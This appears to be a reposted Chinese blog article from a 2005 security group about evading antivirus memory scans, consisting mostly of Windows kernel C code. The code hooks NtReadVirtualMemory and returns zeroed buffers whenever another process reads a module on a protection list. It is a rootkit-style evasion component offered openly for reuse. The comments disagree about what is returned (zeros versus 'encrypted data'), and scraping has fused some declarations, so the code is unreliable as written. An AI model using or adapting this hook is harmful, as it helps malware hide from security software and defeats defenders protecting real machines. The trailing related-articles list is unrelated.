对抗杀毒软件的内存扫描

2024-04-20 16:38

本文主要是介绍对抗杀毒软件的内存扫描,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Author:Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:2005-11-17

/*++
  Author: Polymorphours
 
 Date: 2005/1/10

 通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模块进行扫描,
 如果发现其他进程读被保护模块的内存,则返回0

--*/


typedef struct _LDR_DATA_TABLE_ENTRY {
 
 LIST_ENTRY InLoadOrderLinks;
 LIST_ENTRY InMemoryOrderLinks;
 LIST_ENTRY InInitializationOrderLinks;
 PVOID DllBase;
 PVOID EntryPoint;
 ULONG SizeOfImage;
 UNICODE_STRING FullDllName;
 UNICODE_STRING BaseDllName;
 
 
 /*
 +0x034 Flags: Uint4B
 +0x038 LoadCount: Uint2B
 +0x03a TlsIndex : Uint2B
 +0x03c HashLinks: _LIST_ENTRY
 +0x03c SectionPointer : Ptr32 Void
 +0x040 CheckSum : Uint4B
 +0x044 TimeDateStamp: Uint4B
 +0x044 LoadedImports: Ptr32 Void
 +0x048 EntryPointActivationContext : Ptr32 Void
 +0x04c PatchInformation : Ptr32 Void
 */
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

/*++

 函数名: MyNtReadVirtualMemory
 
 参数:
  IN HANDLE ProcessHandle,
  IN PVOID BaseAddress,
  OUT PVOID Buffer,
  IN ULONG BufferLength,
  OUT PULONG ReturnLength OPTIONAL
 
 功能:
  隐藏保护模块的内存,如果发现有内存扫描到这块内存,则返回加密后的数据扰乱扫描过程
 
 返回:
  NTSTATUS
 
--*/


NTSTATUS
MyNtReadVirtualMemory(
 IN HANDLE ProcessHandle,
 IN PVOID BaseAddress,
 OUT PVOID Buffer,
 IN ULONG BufferLength,
 OUT PULONG ReturnLength OPTIONAL
 )
{
 NTSTATUS status;
 PEPROCESS eProcess;
 PVOIDPeb;
 
 PPEB_LDR_DATA PebLdrData;
 PLDR_DATA_TABLE_ENTRY LdrDataTableHeadList;
 PLDR_DATA_TABLE_ENTRY LdrDataTableEntry;
 
 PLIST_ENTRY Blink;
 PPROTECT_NODEFileNode = NULL;
 BOOLEANbHideFlag = FALSE;
 ULONGImageMaxAddress = 0;

/*
#ifdef _DEBUG
 DbgPrint( "Call Process: %s, BaseAddress: %08x/n", PsGetProcessImageFileName( PsGetCurrentProcess() ), BaseAddress );
#endif
*/

 status =ObReferenceObjectByHandle(
  ProcessHandle,
  FILE_READ_DATA,
  PsProcessType,
  KernelMode,
  (PVOID)& eProcess,
  NULL
  );
 if ( NT_SUCCESS(status) ) {
 
  //
  // 得到PEB的地址
  //
 
  Peb = (PVOID)(*(PULONG)((PCHAR) eProcess + PebOffset));
 
  //
  // 切换到目标进程空间
  //
 
 
  KeAttachProcess( eProcess );
 
  //
  // 判断PEB是否有效,如果有效,那么准备利用PEB结构遍历进程加载的模块
  //

  if ( !MmIsAddressValid( Peb ) ) {

/*
#ifdef _DEBUG
 DbgPrint( "PEB is error./n" );
#endif
*/
 
 KeDetachProcess();
 ObDereferenceObject( eProcess );
 
 goto CLEANUP;
  }
 
  PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));
 
  if ( !PebLdrData ) {
 
 KeDetachProcess();
 ObDereferenceObject( eProcess );
 
 goto CLEANUP;
  }
 
  try {
 
 ProbeForRead (
  PebLdrData,
  sizeof(PEB_LDR_DATA),
  sizeof(ULONG)
  );
 
 //
 // 遍历模块链表
 //
 
 LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData->InLoadOrderModuleList.Flink;
 LdrDataTableEntry = LdrDataTableHeadList;
 
 
 do {
 
  ProbeForRead(
 LdrDataTableEntry,
 sizeof(LDR_DATA_TABLE_ENTRY),
 sizeof(ULONG)
 );
 
  if ( !LdrDataTableEntry->DllBase ) {

 LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 continue;
  }

 
  //
  // 判断读的内存属于那一个模块,如果都不属于,那么放过
  //

  ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase + LdrDataTableEntry->SizeOfImage);
 
  if ( (ULONG)( (ULONG)BaseAddress + BufferLength) < (ULONG)LdrDataTableEntry->DllBase ||
  (ULONG)BaseAddress > ImageMaxAddress ) {

  //
  // 如果不是读模块区域,那么枚举下一个
  //

 LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 continue;
  }
 
  //
  // 如果是被保护的模块,那么返回虚假数据
  //

  bHideFlag = FALSE;
  Blink = ProtectFile.Blink;
 

  while ( Blink != &ProtectFile ) {

 FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );
 
 //
 // 如果发现当前文件存在于隐藏列表,那么设置隐藏标志隐藏它
 //

 if ( wcsstr( FileNode->ProtectName, LdrDataTableEntry->FullDllName.Buffer ) ) {

  bHideFlag = TRUE;
  break;
 }

 Blink = Blink->Blink;
  }
 
  if ( bHideFlag ) {
 
 //
 // 返回原本的进程空间进行处理
 //

 KeDetachProcess();
 ObDereferenceObject( eProcess );

 ProbeForWrite(
  Buffer,
  BufferLength,
  sizeof(ULONG)
  );
 
 memset( Buffer, 0x00, BufferLength );
 
 ProbeForWrite(
  ReturnLength,
  sizeof(PULONG),
  sizeof(ULONG)
  );
 
 *ReturnLength = BufferLength;
 
 return STATUS_SUCCESS;
  }
 
  LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 
 } while ( LdrDataTableEntry != LdrDataTableHeadList );
 

  } except( EXCEPTION_EXECUTE_HANDLER ) {

 if ( !bHideFlag ) {
 
  KeDetachProcess();
  ObDereferenceObject( eProcess );
 }

 goto CLEANUP;
  }


  KeDetachProcess();
  ObDereferenceObject( eProcess );
 }
 
CLEANUP:

 return NtReadVirtualMemory(
 ProcessHandle,
 BaseAddress,
 Buffer,
 BufferLength,
 ReturnLength
 );
}


WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums/ 
 

这篇关于对抗杀毒软件的内存扫描的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/920778

相关文章

Python如何使用__slots__实现节省内存和性能优化

《Python如何使用__slots__实现节省内存和性能优化》你有想过,一个小小的__slots__能让你的Python类内存消耗直接减半吗,没错,今天咱们要聊的就是这个让人眼前一亮的技巧,感兴趣的... 目录背景:内存吃得满满的类__slots__:你的内存管理小助手举个大概的例子:看看效果如何?1.

Vue 调用摄像头扫描条码功能实现代码

《Vue调用摄像头扫描条码功能实现代码》本文介绍了如何使用Vue.js和jsQR库来实现调用摄像头并扫描条码的功能,通过安装依赖、获取摄像头视频流、解析条码等步骤,实现了从开始扫描到停止扫描的完整流... 目录实现步骤:代码实现1. 安装依赖2. vue 页面代码功能说明注意事项以下是一个基于 Vue.js

Redis 内存淘汰策略深度解析(最新推荐)

《Redis内存淘汰策略深度解析(最新推荐)》本文详细探讨了Redis的内存淘汰策略、实现原理、适用场景及最佳实践,介绍了八种内存淘汰策略,包括noeviction、LRU、LFU、TTL、Rand... 目录一、 内存淘汰策略概述二、内存淘汰策略详解2.1 ​noeviction(不淘汰)​2.2 ​LR

Golang基于内存的键值存储缓存库go-cache

《Golang基于内存的键值存储缓存库go-cache》go-cache是一个内存中的key:valuestore/cache库,适用于单机应用程序,本文主要介绍了Golang基于内存的键值存储缓存库... 目录文档安装方法示例1示例2使用注意点优点缺点go-cache 和 Redis 缓存对比1)功能特性

Go使用pprof进行CPU,内存和阻塞情况分析

《Go使用pprof进行CPU,内存和阻塞情况分析》Go语言提供了强大的pprof工具,用于分析CPU、内存、Goroutine阻塞等性能问题,帮助开发者优化程序,提高运行效率,下面我们就来深入了解下... 目录1. pprof 介绍2. 快速上手:启用 pprof3. CPU Profiling:分析 C

golang内存对齐的项目实践

《golang内存对齐的项目实践》本文主要介绍了golang内存对齐的项目实践,内存对齐不仅有助于提高内存访问效率,还确保了与硬件接口的兼容性,是Go语言编程中不可忽视的重要优化手段,下面就来介绍一下... 目录一、结构体中的字段顺序与内存对齐二、内存对齐的原理与规则三、调整结构体字段顺序优化内存对齐四、内

Linux内存泄露的原因排查和解决方案(内存管理方法)

《Linux内存泄露的原因排查和解决方案(内存管理方法)》文章主要介绍了运维团队在Linux处理LB服务内存暴涨、内存报警问题的过程,从发现问题、排查原因到制定解决方案,并从中学习了Linux内存管理... 目录一、问题二、排查过程三、解决方案四、内存管理方法1)linux内存寻址2)Linux分页机制3)

Java循环创建对象内存溢出的解决方法

《Java循环创建对象内存溢出的解决方法》在Java中,如果在循环中不当地创建大量对象而不及时释放内存,很容易导致内存溢出(OutOfMemoryError),所以本文给大家介绍了Java循环创建对象... 目录问题1. 解决方案2. 示例代码2.1 原始版本(可能导致内存溢出)2.2 修改后的版本问题在

大数据小内存排序问题如何巧妙解决

《大数据小内存排序问题如何巧妙解决》文章介绍了大数据小内存排序的三种方法:数据库排序、分治法和位图法,数据库排序简单但速度慢,对设备要求高;分治法高效但实现复杂;位图法可读性差,但存储空间受限... 目录三种方法:方法概要数据库排序(http://www.chinasem.cn对数据库设备要求较高)分治法(常

Redis多种内存淘汰策略及配置技巧分享

《Redis多种内存淘汰策略及配置技巧分享》本文介绍了Redis内存满时的淘汰机制,包括内存淘汰机制的概念,Redis提供的8种淘汰策略(如noeviction、volatile-lru等)及其适用场... 目录前言一、什么是 Redis 的内存淘汰机制?二、Redis 内存淘汰策略1. pythonnoe